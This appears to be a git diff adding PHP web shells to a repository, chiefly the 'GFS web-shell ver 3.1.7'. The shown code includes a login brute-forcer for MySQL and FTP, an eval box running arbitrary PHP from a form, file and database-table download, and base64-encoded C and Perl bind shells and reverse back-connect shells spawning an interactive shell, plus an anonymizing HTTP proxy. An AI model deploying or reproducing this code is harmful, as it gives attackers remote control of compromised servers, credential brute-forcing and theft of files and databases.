+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/php/GFS web-shell ver 3.1.7 - PRiV8.php b/php/GFS web-shell ver 3.1.7 - PRiV8.php
new file mode 100644
index 0000000..603741e
--- /dev/null
+++ b/php/GFS web-shell ver 3.1.7 - PRiV8.php	
@@ -0,0 +1,618 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
